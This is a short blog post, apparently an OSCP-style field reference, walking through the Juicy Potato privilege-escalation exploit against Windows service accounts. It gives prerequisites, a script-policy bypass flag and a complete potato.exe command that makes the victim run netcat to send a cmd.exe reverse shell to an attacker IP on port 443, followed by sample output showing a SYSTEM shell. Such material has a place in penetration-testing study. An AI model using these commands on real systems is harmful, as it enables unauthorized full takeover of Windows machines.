December 16, 2020

Abusing Windows Service Accounts



The Juicy Potato exploit is an infamous loophole in the Windows operating system that allows most local service accounts to gain system level access. It is a fork of the original Rotten Potato exploit, but since the original binary requires a meterpreter shell to successfully execute, we will be using Juicy Potato — an OSCP exam-friendly alternative. This post is intended to be utilized as a quick field reference when testing vulnerable machines.




Contents:

  1. Prerequisites
  2. Preparing the Snap
  3. The Snap
  4. Errors



Prerequisites

  • You have obtained a shell as a service account (i.e, NT AUTHORITY\IUSR or NT AUTHORITY\LOCAL SYSTEM)
  • SeImpersonate OR SeAssignPrimaryToken privilege is enabled.
  • WINPEAS or Exploit-Suggester state that the patches preventing this are not installed.

When all of the above requirements are satisfied, you can escalate your privileges using Juicy Potato.




Preparing The Snap

  1. Download the exploit from here and upload it to the victim machine.
  2. Get the name of the operating system (i.e, Windows Server 2008 R2 Datacenter)
  3. Using the name of the operating system, find a valid CLSID to use for the exploit. This is the token you will be impersonating.

If you can run powershell scripts and have an interactive shell, you can download GetCLSID.ps1 to retrieve a list of valid CLSIDs. You may have to run the script with -ep bypass if you are prevented from running scripts on the system.




The Snap

Now that you have the PoC on the machine and a valid CLSID to impersonate, you can escalate your privileges.

  1. Start up a netcat listener on the attacker machine.
  2. On the victim machine, run the following command to toss back a reverse shell for you to catch.
potato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\nc.exe -e cmd.exe 10.10.14.6 443" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

Example of successful output:

C:\inetpub\drupal-7.54> potato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.10.14.6 443" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
potato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.10.14.6 443" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 1337
....
[+] authresult 0
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

You now have a System shell.




Errors

COM -> recv failed with error: 10038 Try a different CLSID. I got lucky with using the one at the top of this list, but it won't always be that way.